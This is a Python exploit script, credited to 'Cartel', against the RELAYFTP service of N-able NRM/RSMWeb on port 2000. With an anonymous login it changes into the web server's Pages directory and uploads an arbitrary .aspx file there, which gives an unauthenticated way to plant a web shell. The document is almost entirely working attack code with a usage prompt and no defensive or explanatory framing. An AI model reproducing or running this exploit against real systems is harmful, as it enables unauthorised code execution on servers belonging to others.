#!/usr/bin/env python import socket from time import sleep from sys import argv asc = """ ( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. """ chat = ['RELAYFTP', 'USER anonymous', 'TYPE I', 'MODE I', 'CWD C:\\', 'CWD C:\Program Files (x86)\N-able Technologies\NRM\RSMWeb\Pages'] print asc print "Cartel presents: rsm-relayftp-upload.py" if len(argv) < 3: print " usage: rsm-relayftp-upload.py [target] [file.aspx] [[-v]]" print " ...will put [file.aspx] to target:2000/Pages/" raise SystemExit HOST = argv[1] PORT = 2000 debug = None if len(argv) == 4: if argv[3] == "-v": debug = True def getsock(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(30) s.connect((HOST, PORT)) return s def sput(s, p, r=1024): global debug for i in p.split("\n"): if debug: print "> "+i s.send(p+"\n") sleep(0.1) data = s.recv(r) for i in data.split("\n"): if debug: print "< "+i return data print "[+] Setting up session..." s = getsock() for i in chat: try: sput(s,i) except: print "[!] Something went wrong, either the server is not vulnerable or the request timed out." raise SystemExit def getid(data): return data.split("|||")[1].split("|")[0] print "[+] Testing EPSV..." data = sput(s, "EPSV") id = getid(data) s2 = getsock() print "[!] LIST output" print "---" data = sput(s, "LIST") data = sput(s2, "RELAYFTP%s"%id) s2.close() if not debug: print data print "---" f = open(argv[2]).read() print "[!] STOR %s"%argv[2] data = sput(s, "EPSV") id = getid(data) data = sput(s, "STOR %s|%s"%(argv[2], len(f))) s2 = getsock() data = sput(s2, "RELAYFTP%s"%id, r=1) data = sput(s2, f) data = sput(s, "EPSV") id = getid(data) print "[!] LIST output" print "---" data = sput(s, "LIST") s2 = getsock() data = sput(s2, "RELAYFTP%s"%id) if not debug: print data s2.close() print "---" print "[+] execution finished"